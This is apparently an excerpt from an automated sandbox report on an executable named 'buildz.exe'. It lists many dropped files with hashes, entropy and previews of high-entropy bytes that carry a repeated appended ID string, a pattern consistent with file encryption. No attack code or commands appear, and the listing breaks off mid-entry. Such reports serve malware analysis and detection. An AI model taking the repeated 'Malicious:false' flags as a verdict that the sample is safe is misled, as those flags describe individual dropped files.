                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1049
                        Entropy (8bit):7.785573933757521
                        Encrypted:false
                        SSDEEP:24:5/P4+UUP9sRPXu3bx7ff+SOtihVMyUlbAH21h/cF0aASfKvdpDN7zUGbD:51UUP9sRPurFJmihV69AW1VvxSfKvdIA
                        MD5:4786335893AE6EE86F05A01DBB351044
                        SHA1:E694508C3A932AA1A2B503BAB944F596017595CC
                        SHA-256:13196DEEE7E0374B0CA9E07B756794BDAECE4AA5ECE6AAAD657DEF8238E0396B
                        SHA-512:2A4292C29276166B0A55886382792B17B0C45409FDF5F92FABDC7221BE17ABEF9EE324CB1EE338FA8427EBEA03913B16D084B15DD8807F01E939BD8770AD5571
                        Malicious:false
                        Preview:<?xmlTCA...w.\.NN...mwN+Z.-*'.B.7=&..........C...B\o...*.u.;'f...V0...S8.S.....%..5.M.G......1. .v!..]DU}..-Pm...A...|.e..t+.......zP.>.b.7..z...^.....&+0sn.#....ZW..|.....4V......D.._....|.....G...^3..5.!...%^.$5.(..w.u....j....O.9F..Dba...V..K.#..G.W.=;..N./rY.s....W.*.P.....V.t...=.+Vz....w.KI.-.W..d>0...J.=.#.}.k....:...G..'.&.0.....QM.p.j...&..F..IR...^....Y.Q..02.2..}.%G.].].uo....Y...W...R....C..-M&j| .6...W.t....@. ..iV.a.;..)Zk....+.t...CV.J.M9.........-$.:.:...,JE.B..F.0K.A.%........U...*j..Y.|............M.(....F&.U...U.DcJ....n.........zW...a.wi.../.&+...b..O.S.....xo.?....&...sW.a..u..b;......9...p...ZE.K.g..X..e...Q.9.....Z.D.*5...8....Q..W.H...4..T....o.....ho....fj..Qlz.(N...k...?...Z..q......h.T...-.....^{.G}?....R..L./....).....;73\C...k...Ao1..u}...?.+.g..R.d..v..Nk.....V..KCs...%+Tt5.......o..j>Vw.y..U.v.p..v.h=8..r..X./S.i.}.%.C:-c..........A.x.R<ly...5.6{m..8.N?.2..z..{. ...yf..x...z%....).EdRvSqD59xL4qFRlN46qLGl69IpLP
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):807
                        Entropy (8bit):7.738109070054741
                        Encrypted:false
                        SSDEEP:12:YfUgijeI0TnnRtg9EVtW3l+B2gnYsdT32OIYxLHhzqGQkS6FHGW26Gcii9a:Y8+IKRSeVtucwcdT33LHhzlQ76Y0GbD
                        MD5:A0BD42EAC0132F298592360EDC7F0F42
                        SHA1:9AAA056CF5755F9D50273D279A501DB36EFA1779
                        SHA-256:7E8048ABECEBE51E8DE64F95A56439E28B1D2FC6F744A3148A2C9FF7CE92D864
                        SHA-512:615421986966F7F531C37694119BC5F925EF01A1B259A36EE3D7A027B9D4B61C9063E5EB6C10ECFD0C5574B2545342D41E68C69E07DE3738EB08DCECA15D6644
                        Malicious:false
                        Preview:<?xml.....W....ew.~.>.h.0J.....Xp.@.c.GP^..w.U./....;.`...c=]S...&.FC....5a..G....VqN'.._.g."...........`..~=.*.)+o....J7.....;.Z..e../.G5..;..^../.y.].p*.4iZ"@.g/R.F.~.0..7..._.x.Y$.n....:.....]E......L.x.f....Nz..x.`(.....h..."..x.\,..5.e.4......2....Y.2..2I.m..*=C.aV.,.,3..../x.{R.j.A..{...'..2.8C...0..a....x...Bd.P8.Y.4...q...(......Q...a.K.$........G..Gb.C..r?<..N...d.]z....8..2.a8....j`....<..O.UM.!...BY...C..b...........$..F..w. ;5.39.[.`..J<..[.F..e.%....U.#.[..$fH...O..|.,]u..D..1,.n;.i.n5....MC`....x8c?y...v\_B...V.Xt(p....^&..b..~..e?^..{...y.|b...Jo.:..1cU......1..).?3..|.H............8.......t&pg.....t...O.7.Jd.....]..A..~#...U..R.....e....n....i....p8>0.t>........#L....^UIEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):853
                        Entropy (8bit):7.756634935401895
                        Encrypted:false
                        SSDEEP:24:82+SRUR9FosdGG2YYBQHJyL6114SfHvmQoH8GbD:8Zvosd928JyL6113f0H8UD
                        MD5:A53D933A9EF4514AF9368FB15DE5872C
                        SHA1:5EDB92AD48C45F5DD0FD5A7A8B278A035E7EDAF4
                        SHA-256:756CC9EEAF98AFFD8237281F8F588A75DBC1EBAE6861D6CC652AE21781EC012E
                        SHA-512:511A133AF067EEBB454E72BE312261C7C8FB63FE8660F4094A21057416E88FBF4EF468BD356DBC71FFE90CE726A8804D8D33AA2AA6C8018180414AE0B40075F3
                        Malicious:false
                        Preview:<?xml..F9..I....X#{.....j..;A.R.W?.Q.m.Ec!Mfkl......K.<..e.=..\4.z.o.?......LZY.s.c=..;[%........[.?6I0k.._...z...~u.O0JR6.P......OD.'.H..@>."Z...o..$..Bh....r*.%.. ..`Y..,......Zd..lr^.J.f\X..........v...;._..,H]..N..7...{GL.W....+...O......*.Q[Yt..ez....VU .....Q...Vz....S.0.!#.,G..Ia(...h..'[..d.C....p..n.^..!]l..Tf....V..6;'s.....'..w.D(.s.8n..[.X..I[....N..W....|..\...pR@i5.o.....\.S.U......N..k..;Q.vX.....d3i.}G..6..K..o.8..c..,...0...XyqL.A....P........,_..E*.SI....l..2o}5_K..~.....t[.......".....w......$uW.Yz..T..\.^....XI.5,..<.._.q.`.....B.6.d.)TP........~d...U*m.S..4 ......t.{....w.....R..3r...4..],.....s$uq/lY..q....f...43.........|~@. .....y..-AY52...8@.<m[.H~8.Kw..BF...._.W..D\..B.J.....Jh..}.....+"G#tQ....l.....B..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):912
                        Entropy (8bit):7.743265588751358
                        Encrypted:false
                        SSDEEP:12:wvoUTy349ft+4yxJ/u4sZ9mZN+j+sE7mD+sO3rNA0bpl9WIZpi85P6s826Gcii9a:Fcy3QM4ZjZYN+CsssArq0bpvDZUaAGbD
                        MD5:CA1B333BB347A3057EFF46E835DE16F7
                        SHA1:EBF5F03E60021E1EF918C1AAB01E44903109EB15
                        SHA-256:E92CEC6F5E9CCEF1BF76461C1DF593937753B0D92C5130ADBB93EACBD1295071
                        SHA-512:51434A0D9CEED069D002A4E8BA446EBEE806AE2469B98ACA919062E30E61DD84A3AE81ECF5471FAAB8CFD25A5F4ED9BBB5F6AAC0DC9B351E9EB6E767383AEB78
                        Malicious:false
                        Preview:<?xml.4...9...u.dyGM.+...6..J.....Ae... -..R......#x....et.]..v.x>aA....G..)jmE.[N....y.Hu#...PZXM'Y).......E.?A..pd...*....e4%.H..H.]*...w2C..P.O..l..Be....@.@....+..W......h....@T-p.b..p.K.....'...vZ..y..2.\..d...vQ'}....n.1.U[`biG..x.....U.X..>^.......[..U...GG....s[..bJ}.)..M.%.F...K..W....k~.X....6.{.&.J..},................%...@GF..... .!pB.=$..qDr........w...ap.z.,.+|..@.K..5.........-..6&...ash...Gg..P{."...}p.......A.A2.....Re.....D.........p.T..F....t..*3...q(...otc.d.oZB...=.9.P.....V...T[.CU..&..H.O.].ic..vDy...s.....r..c........lbk.q..=0.0E...*..1.NaL.S.%..$...K:|j....P.I..c).1J.MR.yt.|.>..^K....H.........3.....\9..KO...-..F.....S../.Q.].2T.n.7$6...B.5=...-...0..]Bc..yo..^...\ieX.......9.".<2Zu....Sp....~..]C?.Q".h..Ts?Wh.].b...\!f.....}g.;..{.N.~.X2.s..%......'.y.f1EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3310
                        Entropy (8bit):7.942847565776726
                        Encrypted:false
                        SSDEEP:48:P25jYsUElXarHh6Zxl5LRocpYILBK3cNj79gP+2rivv8Av9UgNVHRxCDwG8fJhsA:P2D/OB+9o1QBK3cNBgP+2cRxA8fJhsA
                        MD5:4B01E729F82946B0FD0F19744877FDF5
                        SHA1:9B9C3789B5A7B3FE10051BC32E7FB252E756C6DE
                        SHA-256:9C0FC6CAE5E8ECACB0B0ACA35C0DF1D851667330B491B47294BBB68303ABBA91
                        SHA-512:214AEE1B92645DDDB54CDC75AE930F416549895C6509535593C74CCE6E2FBCBE5AF5C968E61FC35BDBDE305690A64B08CD3E09D44F1C95D75E0B99F04D3DD59F
                        Malicious:false
                        Preview:<?xml.......D.J.y1._....chZ.F..ze..X.B....]6I.....>o<.1h.r..T.#.....tI5,J......\.........!.....R+z{.K...P.p.]...Y.PO.........GAb..pKi.../$|.dji#>K.mc.....#z....h.:...;h_.....^6.ro..t;j.....(*N.....g...R..........j.&o.<6.|.,%N..5...0\dme..V..!..h......Ka...&.)...Y`.,...i.3a..{.O.l....}...........xw.na.i..(I.t...Iux...P.$9.3...-..e).....1?[<P.v...o..S...v. .4.}l.3aM.5P.ht..5..5.A.?..._....Q^V.N...3....|...-.#....T..4..3....&Q..,...{..+V......#...!....D..P..R..E...D...[........4...1.8....v(.......q....U.a.B|^.....; .K...g.G...q.8._.*.......s4....x....>..._.....b.?.<..Q...6qZ.\..@I(..u..`k.........%c&.Ior..Eg'_.....Z......o8$...r5A.. .<..7.F.:..b...i.\.34..2....{b9..,8g....E..i.w...w..?.H..L...._J.f.v.)......C..*ha..+.....'iN..c...w..y......-9....M.i.~.x.6)5..*.+.%..~]g.|"FR.2 .c....V^Q_...R..~.~.2.(X4.".....[k.r.6t....[...H.w(W<c...\6.`....?..s...$f..K.!..l.LO2.t...g.y.Q.7...Q-wm.{....H....92.M;K.n..^Ys....K`.t!.6..\Q56.`c...W.1."....B.d=."..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):910
                        Entropy (8bit):7.777365331409025
                        Encrypted:false
                        SSDEEP:24:eUt0LY7BBANv6yA22SdvWBEmRz3Aa61wlaHGbD:eUf7BBANv9Pq3RzAaK8aHUD
                        MD5:8F39B90F94F7DEC90707FE9E44D5201A
                        SHA1:B394A03BCAB7F95F201A2ED6086AA60EE5B9E016
                        SHA-256:95E2AF8D3CC4BB8A6EF76EFBC64658317B073DDD34752DC5C3BC077F248E19E1
                        SHA-512:23A9CC37619200DCF59A7FE21451E0F6CA022C33577CF9A78A12D6A40A5D71FB506EB4D4DF4D3929128642D51232C6229F5902C748669ECF86FC1294FD60FCB3
                        Malicious:false
                        Preview:<?xmlo....&../..A..S)..9M......@.Lo.W.....5...tdV..\..5.B.......,............r9P...0._k.......%..r...]0...*.;./...~..W...|."6'..."oX.2.k...g.p.{ph.".....^#..~.H.;w.P.......L.p..........c.h.n.>..S.m...r...W..+."xQ{S`.Z6.=.X..fO..(..._.1=..O".V.@...5..?.lD&US.$xo...u..&\..e..\i.q......Y...{6.\./.}..B.....'.'Tn.<..Z......Bh.uM...!W.arV........".C..e.O...a1<q..h)]I.'q........[A!.s*.T..p...J?.....'.=.......6=....<.!X.c.Q..H......OK...o;Dq.?..........z..g.6K..o....b../s.o..<_=Q.Hn{a....l;..93)......Di/.......o]vj..M.=....#....:.D..e.6L.....?..h....,-$.@rmVpG\...4.B.;.7..C)w...l.......3.2..U~.~.....T..>..`......5Z...Uh.O..}.i..d.....7..SB...t81-lj$+...e-M...I.U.....`e...H..tU..}.......q.....?O.. ...'U....I.3|T..G.....o..........T..Kb.....Kv.m..t...e.....[)zC.D9.Ld.'.Mq...U,.).<..9.}..M.$.zEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):941
                        Entropy (8bit):7.7835700122459475
                        Encrypted:false
                        SSDEEP:24:+e7Hm4svPALiZgPTMWzDdBthoF8azs/kDlqHV2CPuuZYEGbD:+KiPAOZg1DzfoFe1HWuZjUD
                        MD5:567B39081B67DD48B96240E865C65927
                        SHA1:56C3311356675B53D7AAE86ABC401FFDBCB362CE
                        SHA-256:2C5762F019CD3086BC641BF2EC6543EF071A662C767E8CB19BAD285F89B81506
                        SHA-512:483C1061038CFA4A42FC709883D68BF6FC7542CCC041E256372EB768EA02B6912415F747EB6716FF089547D075D40358D2E0FA4E173724132D8DAE0AB256CB77
                        Malicious:false
                        Preview:<?xml_gh>........Z...-......Q.`.#.j.q.V....h]Y1.C...M.Oe..O./....f..7...k.x..N.RL........O.A...s...e.5.reG..ok..).j.r==.7.7..^..E..sD8...!......J...$.`....b1........r..:....v....@y.JA.....r.GRX...o.7..\;=."....\.0.m]..@z......7......E?.g=b..m.$.|G.Sa.i..dwt..G.U....Q....3...k../.w...O..>R..^.n..bY..E2.-2....3.9......!{C...[.C.8.I.d...H...;.ZA..W...j.....".;.h@V....._.]0..).5...)5WI.Q.u.K......(.G..s.[..u..j....+&.D..>.i..v..-e..T.........x...8.0.S:..E....%A.(....K}.{uw..#.5`..!".&..F5..G..BL..v............i.Si..s.~./...A..7.....gX.'.V.z.v'.me...'....:5..r......mr.U...y0..R.yv.aL.A..K.-e;.uN..au{....H....7.... 4.v.."b,eF|v.yn...........D....H_.UM8...R.gp.J.<..@+.......T.|.5A........s.-.........Y?.e2.I..>.....qP......&$.n..$......."i...k..0.2..Si....a.....7......n.m.0Z..b..v.I%Z[....Ws.<......S...A.6.a1EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):787
                        Entropy (8bit):7.7439736466573805
                        Encrypted:false
                        SSDEEP:12:hc6AkU4WkN4+uSeyBOCcpKla3VA+HJVDbnDsmVbXCZFCBHJxIfuUud26Gcii9a:aLkN4+9eyBAyutVD7IubUKpxQuhGbD
                        MD5:3E13C4301B1846C3FCFB89CA45E114C5
                        SHA1:1A918279406079579D053DEF54E4450CE590C73F
                        SHA-256:10D305FDEE6961F32C90F0EAC8DB52DAF9973E247D36B6A2B91CE5B807B54132
                        SHA-512:8CF14F757838D505BD737BE65706C13CC1915A6E438B9CCB5F690899527078C253862EFE1268D48F4EF47BCD5EE6A22492E8925029B3DAA61561064C384CC9E9
                        Malicious:false
                        Preview:<?xml.S..../..{G......_...}^...r7`...l..B..).......$F...[..p.5.Z...5B-..,..4...no.K...B.....Z.id..6..y3.C.....79T.<K.}#.Q..w....}tgv..3!<e.._Vf.ylvkt_t...<s..]m......1..e4Q.Z..0.(..+...K....c..Y....*.t.;...b.F.........L..4..a GW].....PeK6.P.9C...Xs..OI..v...w....0....u.jy.N..i..6.y>m.j..`.l..n.a3.....U..[../..~..JB(W.c..q./|.1J..62.rY.-.E|.wx..I..tT........./WL.......P.A.......V.?.:5.8Az.g.2)T\..;W..K..[.YF.[.X.g...q..(..+..~:.jk..`._.Ne...%.H.........>@..i...6=N..'.*........[K=x|{...'x.Htd.b..FD.3;O..ra/BfC.....a..8...&u.p...z.. t]8.j...K...........+.&`..r..Ix,V.D....@.o-.>E.+7...c.S..F..fNT?-.NQ.}..W...J........Q-.....V..s...|{..o.AH.v.R.].|.Y..p.j.s.YV....}k.....(...h...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):961
                        Entropy (8bit):7.7589845289457156
                        Encrypted:false
                        SSDEEP:24:thXPqVzRGL431FofbopxI55KvBtOgEkRXDIlkGbD:th/B4zofbwxInK/pRTI6UD
                        MD5:3D75A48791B8D84CCFAF27FA620D97CC
                        SHA1:AD7CD756FBACB54A79AC49857F22E5A2E99E0B41
                        SHA-256:DE68435896272E6FEDE68F5610252AA3B14EC444651A7B3D49383D42FC833614
                        SHA-512:BA7C72B85931290D920744A2E026A765370763545A84D9D08211477FCCEF69C54E4A49BE95AD7575A7B993F69F4B10AB646CA6B8B439DC7A90CEB7F0537823CE
                        Malicious:false
                        Preview:<?xml.i.F.RO.. .@.".f.g%....]...~....S.h..b..+.]H{mH.....E........9N.....U&.........L.K.J..'..*.K....S6ib3.......,.U.W.N8.50..s,.~%'.A..Vx0-x.B5...*. .?..[3..2.%]...<...1)..(.C.....-...!/......$..k"..k.....W21.~1...}*...w.6..0.*.?...Hy.)uy..i.xJ...N0DT..IT....R....w...T.6......l...(^.C..3z`.r.B..!.D..A....]".x.}...$PR8j...O..*.+....S....k.m.....&...o....y.}v.......[.J.7.....GM..A..{yg..v...F@..4&...^o..K^.q.. .B.VpV..f.o.c/......8.i^d..`.|#......Z~'.>}.q...D...&./1. ..........'.....a..O.B..WJ.p..G..!...(..g...r......&.Ap2.*.Q......8...>.-.~........y7.|%.V/.2....2._`.......H(.....UL.Me.S#.j]E.....ijW=.n..../.|.r..../e......?....A......G.....x.....E...&Z..0tZ......{...hP..L...x]oRJ\..B.4...<.x...5.~...s..e.E.b,.7J....d...V......o...N+..$...c...F..k.....I.r....gP....}."..H..^D..%..+.0...w...}...}....u{.Y6.....?..4N...(N..<}&..7K.~K.W]...2.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1131
                        Entropy (8bit):7.7938218036992195
                        Encrypted:false
                        SSDEEP:24:xSq0L8pgELm9/AP3dnEMrGSkx6/L0uWY+3MO0wHGbD:xSqw87mOVEME6/L0eEMOjUD
                        MD5:8FFB7AE8490CE02D2282DEA26B23A1EA
                        SHA1:14B6F57D6A6B3F1DB12A7290760BBB9589A60A42
                        SHA-256:469D3A573DA87A311101EAF7A3469EB81E1650F97333BCD522E89698DDA1708F
                        SHA-512:47A230B9F545B1C917BD281126B550A422D6EE49C597DCB68EA4F37121A608AE4E55FB250094FCD0EA1521B1897CB4677D5BBCCE4E915F73C06F20947C4AEF75
                        Malicious:false
                        Preview:<?xmlY..tK.......$tK..E...hp.{".D...._.s..`.>....0...9..uT"`....e.F.:..V0j......&.3[.{<...3.Hs.y.`.U.%_...../..W.~....9.7.....`......ch&...6.x..UWF(.5.U.H.....bQ..$..?..L:Su....VY.?.W../..30.[....%....`Mm.1P2X7IR.]7j....>..^..s..+.i.}..<....Y.d.Z.G..[.}...{G.yF>.Ss}.._.V...]T..\?.1!m.\...)..&k5.k.G>.i.....e.u9.8....m7.p.'...%{(.F.`....K.......J.9..u.....r.O..Z..Q..`.|..S~.......X..\..E...H... .5......4;k#.f..,^.g.......i2/.+..H..H..y...m...Eq..6.n.t.AO...*JV..J...>K....^.A..>......z....{Y......Q..0.%.>6I..2)VeX..[...g.|...V.P.j....TQ...b6...Y....U..D.n|.8M.1`........D...."..Z............N...%w..W.0.'.9.W..n@.k..'rc. 3(.i...... r..+....Q,[..?..kN.7}.~.xd........^..5w..o..f..0..s..2i..s..p......r..Z.x....;....=.;A..6.^Af...A.......4r..m.}.6.<......).e...:).S. ..o....y......!A1gB.(...^.d$..9...umP....VDcL...]..^=.#.hf..>....D9.m....X....?..{..0#D.p.d.......9......Eq....BJ9..203..0.R3./V....................7Kg.>^.=_.A.Q...r`'>FO.^.......,;...r)J
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):987
                        Entropy (8bit):7.758017187293638
                        Encrypted:false
                        SSDEEP:24:ePaKwvtbskDwcTXz282JtSzNTlJXeiCw3dEwoMZRRGbD:ePubsoBTXigzNpJXeiCw3XoMXRUD
                        MD5:0FEF5EC4B0C2FADA0E84EE373E3568FD
                        SHA1:8D43B9B7E85B5168A5500456F1DA2B71EEDA4B9D
                        SHA-256:6AC7A601742BD5D04D49A229BBBA597754441AF7BA98C99B4E18813D1C5AB1B4
                        SHA-512:036279593B2CFF97E46B85CF37F684CCEB2277E488390FE4B19625EA8022692E68E480BF624256D28A2EA797044137B2E2EA66CF5634E513CFD115E73C7298A9
                        Malicious:false
                        Preview:<?xml./J.)...)..}21....*Zb.."....5#?.v..o.ZuP[;..E../..g..;....m.a..g5VL..M.[. ...!.[k.-$...8...R..<.......).6N...f7rZ..$..CJ...x<.E....Q..D..E........[dp..oFdbV.;T.?...a..v.\Z..........?.I..H.ON....5o.9.....m.....9...Y..q3~.-.}./.F..3H.$............/m[.j@.....G?.E.."q..n#. ....T.9P....u...c..L..>..l.e.....sd..6H..P.vEg..6.<.z._...b..5*J9....k.}.^#...#.#.%U...;m8_...c....r.bX^..Rt......=...j.C.....@V....^..f..W...#Up.....A.&r..2..Z~N......2d.%..1%..o@Y........+....#...+O...n.q~.J"...CV.7q[kx..-.Q09.F..C..N...V.........8`.Ew.G..G.N....%.P]....~.._T.}..|.>.:..Vp.}C..5D..C..F0..7...7.L@.S.L..}. ./vW...W.cK.9V..`e...*..........x.[~.4..A..'..p>B\.Uu>^.....WJ:..._..xxCgBY.W....5b..... `|...+K..s..vI..f......=...&s}.....\g.......a0..`../.....}8.T.MG}.UR....+G.,c.Y.$u..T-.`/t.O...O.1]..sl..XJ...ga.hm.GK.....pA....o.5..+f0.xt.t(....a.N...?..."..Fb.jYS.R.u..`}P.....]EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):857
                        Entropy (8bit):7.739213942300772
                        Encrypted:false
                        SSDEEP:24:O0fBqGwa6X50CyNNWlCyHKnKEMBgwRGGbD:lPwatDjW3uKEkiUD
                        MD5:824377E889243E61E77567E93C0A9B95
                        SHA1:95EBB435CAA9E03FFDE2F7E04D132C09F0A8CEB1
                        SHA-256:0837B902BDFCEE750C575068D4A9F4A99D2689D9A837D5461C2C1D7C03E385FC
                        SHA-512:B1463320132567EC16AD53C4D71786691DCA558D60379D447CAE462951F90AE489A3835FA1B8B70FC84AD531B5B6F62DE46DEAB2E7DBB5A001AF2D111FA35A48
                        Malicious:false
                        Preview:<?xml..`...a.iS.....i3....7. .k..;..}.....|....2.1.h_.6 p..T+......{pQ.R..L.y(f...~.|......j_.(M%..........v.JB9aSV51NM.U.(./&.od...]Vg<......y......(..@...z..+.:.../3a...w.~.r..[.Av..A...8.....6....O......@....NS...l.\...i..3.i........E....14..FP.YW...'.....5.!.I.P..+..._E...]U....?...0.Q.....L..?.."5P..W.hY....*+f.7J..V&..(*..[..d..bI.\}@.K&.......D.lPl.`.\&/..i.... ....u~...q}.G..E...O.g"..."E1....n.a.gYBHm...j]........E2v=....N.Z,n..q..(.Db.+.o.XIh..x.m..])......[{..%......`...._6....g..h.B...= :.(&.{......$.!.}5.k..^...P8?}.3.QT.\..>.n=..rKrpr.w..P+u..fz4E..O....gQ..8............6Z..V)o.......,....E.^.._.&.g....3U7#...{..v..,...+B.z6...L+....'.6.f...N..(.i!2.;..r....9.F.F0l......(M%uk{%.c..(Wz.(.....&.-.u...z.....02.9......B#..}.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):859
                        Entropy (8bit):7.747979949857894
                        Encrypted:false
                        SSDEEP:24:X2oRTCtvHwQ8Eg/zxTnt27AEZtHy8N+EvGbD:3RoQQrg/zxAjZNnUD
                        MD5:BB9EF628E6749C5BEEFC0213EEEDBA86
                        SHA1:A8421E65A446D3436FB63C473F99A659559CBA04
                        SHA-256:BB75B5F8E0B2AF8A50CD5EB82E086FC9D53D8FC746B5882708E8B17E0667C863
                        SHA-512:DA5315560902626A0A6F2C9BA33091C39D2BA046A4282A23A358146ACF2C8F7422A1E8A2D243173A3076DCBA181BA0CB9F4789C214ADB706F3816296BD4426AD
                        Malicious:false
                        Preview:<?xml.,....?..`.e...L*{..r...0....j.T.....~.K(. .<g&U..H.cQn..m..]...m.....A.k..N.#...?..-Y.J..D..,?...^M.2V..D_....].".$.C?\..=..{|.!p.4....{.U9'..k...+kf..s..^.@.i..)..p...8o..bt....:.x..k{.m.;5..L3....6F.......{K.b.Z.0ic.W.f$.).ca.......e..0.a..Cj..b..h.5...Dg../...a.(FKT.........S..HV......,3.S..yo..6.|......A.v.a\..I...|v.',.h..|MI.......O.4.)..$.....x+..G..Z./.W..o...2..vyv.E.u`n..1x<....:.Lg..+Iu9..7..6.i6a.p./..uv...j...)g.^>P<}.....|...5.E%..=.s...Zi....3caB.^m....;k..}. i. ......n@...x._.-..%.I[....F....".>.....V..O..1./lNe,....R.1.%....9+..Kz)............A..p...1.zI....r..\.k{...).].s...{.&..s..K..[....P..E./.h.....j...g7.f........j F....l%.HO+m.......{.|M.rC.I../m/`:..B..P..%c.R%.g....E..m..............2q.U(^#......8a..)YEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):725
                        Entropy (8bit):7.702607918185763
                        Encrypted:false
                        SSDEEP:12:9hKpra2LdwqeHMrxzM6p7nDRCBHnoUBHzyh0sgJFBdWs20CTEFMAws26Gcii9a:9hKpFhwv1abDeHLBHp5lMeGbD
                        MD5:CDEA2E60619C55D1876AD2754A8DDEE9
                        SHA1:6AA90579E60E31DEA8E25BF7EE81EF588BA71036
                        SHA-256:3DBB655E1F4FCEA6FF783FBDE599BA94F8494E2F1E9C8739C781F9487E772327
                        SHA-512:A19CD3DF6848DCEE768429B74F3613E7306D3F65940D155C09E6212C0FFE51C4B4C49785C7734C682D7F3318F6CDAA8EAF64F715348B840435F2258E06354F88
                        Malicious:false
                        Preview:<?xml..._t..X.ZR..V.{.-o' .!..P......J..J............{Y..DAw...}.n./_#z.?.N..^..?f.RZ...%..&u...IcZ.@1..Y...!.A....F.YE..*=.O...:...9....$#.....M.i=.(trt..o.....h.z..*...^btD}......'>B....#.^..^hP..<f..%C....1...../Gp...1....&gG.....0.^.....9Vc...}~.*3@.....c.{....KW...13.f.RQI...qa....#.]N<.?.......g\R}....P.I$....Df.W.Y..j~...h.omd....#..q....i9..1.1............T2.{(y0..M......,}...V.1..Q....}:.k.I......X..1].Y..... .....b.h...fD...[k/..Y.......]..G~.0:&.\L.'Cp.;.......|).`....U.NQZ.j.....x ...........{.|.,...=...}..F.#".k..F.L'.$.".p...I2..w..9.;v.$.S.e.e..[I....~.`vQh..rB8..g.u.6..?..Lu.8.(.@..'.h.2.rEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1175
                        Entropy (8bit):7.815415781273711
                        Encrypted:false
                        SSDEEP:24:oPOMEdU7dhEsDEH97CD35u2NlWA9OSE/SH8sKmiHiyX7lnbYKvjEXKHLyF+HGbD:PME27dXEd7KnVE/M8s7mWK46r1UD
                        MD5:DCA689A23DF18CF2944B1C574A422445
                        SHA1:974EC0547DFCE74CCD019C7043F13757C63FD7AF
                        SHA-256:B2B4C5B04264B7B5AC42CC9DB36AEED9FC705BD89FAF86B87BC5D6BD0AACF0EE
                        SHA-512:AC436AD2733C41BD1F8212115CA174938729ABD9097161CE24FF63C20F141C11CF47E7F0D8C747D7BB19945F4522F60956248B8BAC4476D3E0C471DDED6C58BF
                        Malicious:false
                        Preview:<?xmlW.$.1...^...32....8&..`.v'W.`+'.....O6..hy.h..Du..Iml...n.d ..T..s.3......S.,.....U..%.:d.l....Q..V.FI.*....n......n.k....D{.td.f..,j.`....&..}.{4..E..........jV.].4$'....n...w.....yg.m@..b.z.-.Z...._.{.M.{9FC.{.W.S...6..M..5..rC..S.7.*...FG...$>.$........S.R~Qn..j.>Me..x.(X.$...^k..y^.....f.D*@r..).:.a.2..!.'.}...n/...x...*._#.........y).E...2....3jI..G6.-e.RM. ..{.r....3.e.J ...^r.....%.o.I*...L8.j..0..1ZH..m......O..?M.)j...|.#.=r...;..7(-.}H....l.3..Qy..v....e`1]a.G.\.F...fNE.2.k.L..1....4:.....s..y..H-<.T.6'.\%..u...<JZ.Ks.B.Rpo...27..!D+.|....2.....Yn.U.K4....w....w..[.6.'+.:s'.0..p.........Y2..........h..9..6w.U....%.&.s.......C..Vu(...*x].T.......y&O..t....?W...2.G;.)..7G.D..........%....D.=6.?.E].B.o.9't.rw...k..!...cmw....C...4......G6......yP.8.2........wpUI.T.:..........c....BU.....QI..j.....J..;...J.....r.......p.....~0.\.Z..x..M..........=....}.)a;..%..}..........6<..5....1.m...H.....w..i..$.I..iYdH...q?^.<'B..j~oL...7
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):724
                        Entropy (8bit):7.661301833988827
                        Encrypted:false
                        SSDEEP:12:mNofhiBGuqZlxFpidO8075TFKnNdz694IU7ATUKD2lFKGef+2obC1Bn26Gcii9a:mNoEtwLYdd05FwpP4UiLB/obC1BfGbD
                        MD5:BE333F3A0EF85E833F1A150943432B80
                        SHA1:821CFFA9C03650D32BBE22F3B6D6A9D408A3E78F
